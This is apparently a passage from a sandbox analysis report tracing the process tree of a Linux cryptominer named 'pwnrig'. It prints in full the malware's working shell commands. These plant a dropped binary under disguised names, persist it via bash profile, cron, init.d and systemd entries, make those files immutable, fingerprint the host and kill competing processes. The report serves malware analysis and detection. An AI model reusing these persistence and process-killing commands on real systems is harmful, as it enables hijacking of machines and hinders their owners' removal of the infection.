-i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
PID:3469 -
/usr/bin/idid -u4⤵PID:3470
-
-
/usr/bin/idid -u4⤵PID:3471
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
PID:3472
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:3473
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:3474
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:3475
-
-
/usr/bin/idid -u4⤵PID:3476
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:3477
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:3478
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3479
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:3480
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:3481
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:3483
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:3484
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
PID:3485
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3486
-
-
/usr/bin/whichwhich chkconfig4⤵PID:3487
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:3488
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵PID:3489
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:3490 -
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3491
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3491
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵PID:3491
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵
- Reads EFI boot settings
PID:3491
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3517
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3517
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3517
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3517
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:3543
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3544
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3544
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3544
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:3544
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:3570
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:3571
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:3573
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Attempts to change immutable files
- Modifies init.d
PID:3574
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
PID:3575
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:3576
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3577
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3577
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3577
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:3577
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:3603
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:3604
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:3604
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:3604
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:3604
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3605
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3605
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3605
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:3605
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:3631
-
-
/usr/bin/whichwhich systemctl4⤵PID:3632
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3633
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵PID:3634
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:3635
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:3637
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:3638
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3639
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
- Reads EFI boot settings
PID:3640
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
PID:3666
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3692
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
PID:3718
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3775 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
PID:3799 -
/usr/bin/hostnamehostname -I4⤵PID:3802
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3804
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:3809
-
-
/usr/bin/headhead -n 14⤵PID:3808
-
-
/usr/bin/grepgrep "Port "4⤵PID:3807
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:3806
-
-
/usr/bin/whoamiwhoami4⤵PID:3810
-
-
/usr/bin/hostnamehostname4⤵PID:3811
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵PID:3812
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:3818
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:3817
-
-
/usr/bin/cutcut -d: -f24⤵PID:3816
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3815
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3821
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3824
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3827
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3828
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3830
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵PID:3829
-
-
/usr/bin/idid -u4⤵PID:3832
-
-
/usr/bin/grepgrep -v grep4⤵PID:3835
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:3834
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
PID:3833
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
PID:3837 -
/usr/bin/idid -u4⤵PID:3838
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3843
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵PID:3842
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:3841
-
-
/usr/bin/grepgrep -v grep4⤵PID:3840
-
-
/usr/bin/psps aux4⤵
- Process Discovery
- Reads runtime system information
PID:3839
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
PID:3845 -
/usr/bin/idid -u4⤵PID:3846
-
-
/usr/bin/wcwc -l4⤵PID:3852
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3851
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵PID:3850
-
-
/usr/bin/grepgrep -v grep4⤵PID:3849
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:3848
-
-
-
-
/usr/bin/crontabcrontab -r2⤵PID:3853
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
PID:3854
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads CPU attributes
- Reads runtime system information
PID:3855
-
-
/usr/bin/bashbash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:3856
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:3858
-
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵
- Attempts to change immutable files
PID:3859
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵
- Attempts to change immutable files
PID:3860
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵PID:3861
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:3862
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵PID:3863
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:3864
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵PID:3865
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:3866
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵PID:3867
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:3868
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵PID:3869
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:3870
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵PID:3871
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:3872
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3873
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:3874 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:3875
-
/usr/bin/hostnamehostname -I4⤵PID:3878
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3880
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:3885
-
-
/usr/bin/headhead -n 14⤵PID:3884
-
-
/usr/bin/grepgrep "Port "4⤵PID:3883
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:3882
-
-
/usr/bin/whoamiwhoami4⤵PID:3886
-
-
/usr/bin/hostnamehostname4⤵PID:3887
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3888
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:3894
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:3893
-
-
/usr/bin/cutcut -d: -f24⤵PID:3892
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3891
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3897
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3900
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3903
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3904
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3906
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
PID:3905
-
-
/usr/bin/idid -u4⤵PID:3908
-
-
/usr/bin/grepgrep -v grep4⤵PID:3911
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:3910
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
PID:3909
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
PID:3913 -
/usr/bin/idid -u4⤵PID:3914
-
-
/usr/bin/idid -u4⤵PID:3915
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:3916
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:3917
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:3918
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:3919
-
-
/usr/bin/idid -u4⤵PID:3920
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:3921
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:3922
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3923
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:3924
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:3925
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:3927
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Attempts to change immutable files
- Creates/modifies Cron job
PID:3928
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
PID:3929
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3930
-
-
